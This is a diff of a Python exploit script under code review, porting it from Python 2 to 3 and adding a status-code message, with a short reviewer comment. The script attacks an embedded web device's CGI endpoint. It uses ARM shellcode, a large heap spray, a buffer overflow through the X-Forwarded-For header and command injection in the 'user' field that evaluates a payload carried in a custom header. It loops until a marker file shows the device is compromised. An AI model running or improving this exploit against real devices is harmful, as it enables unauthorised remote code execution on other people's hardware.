exploit.py

```diff
@@ -21,85 +21,87 @@
                     "\x69\x3e\x83\xe2" + #add r3, 0x690
                     "\x13\xff\x2f\xe1"   #bx r3
 }
- 
+
 def request(target, data, headers):
     url = target + exploit_data['target_endpoint']
     return requests.post(url, headers = headers, data = data, verify = False)
- 
+
 def vulnerable(target):
-    print ">> Checking if likely to be vulnerable"
-   
+    print(">> Checking if likely to be vulnerable")
+
     headers = {
         'User-Agent': 'Vuln tester',
         'X-Forwarded-For': "A" * 200
     }
- 
+
     try:
         r = request(target, "user=admin", headers)
     except:
-        print "Something wrong: {}".format(sys.exc_info()[0])
+        print("Something wrong: {}".format(sys.exc_info()[0]))
         sys.exit()
     return (r.status_code == 500)
- 
+
 def spray(n):
     spray = ""
     for i in range(n):
         spray += '{}={}&'.format(exploit_data["shellcode"]*3+"\x08\x80\xa0\xe1", exploit_data["shellcode"]*3+"\x08\x80\xa0\xe1")
     return spray[:-1]
- 
+
 def exploit(target):
-    print "Let's " + exploit_data['payload'] + "\n! COULD TAKE A WHILE !"
-   
+    print("Let's " + exploit_data['payload'] + "\n! COULD TAKE A WHILE !")
+
     if requests.get(target + "/cgi-bin/pwn").status_code == 200:
-        print "... but first you need to clean up your mess, don't you?"
+        print("... but first you need to clean up your mess, don't you?")
         sys.exit()
- 
+
     headers = {
         'W00T': exploit_data['payload'],
         'X-Forwarded-For': exploit_data["bof"] #There were others, I'm sure you can figure'em out yourself if you need
     }
     data = spray(31337) + "&user=touch /home/httpd/cgi-bin/pwn; eval $HTTP_W00T;"
-   
+
     while True:
-        #print '.'
         try:
             request(target, data, headers)
-            if requests.get(target + "/cgi-bin/pwn").status_code == 200:
-                print ">> w00t :)"
+            response = requests.get(target + "/cgi-bin/pwn")
+            if response.status_code == 200:
+                print(">> w00t :)")
                 break
+            else:
+                print('The current status code is: %s' % response.status_code)
```

Comment:
Adding this printed message to present the status code if the HTTP status code is not `200`.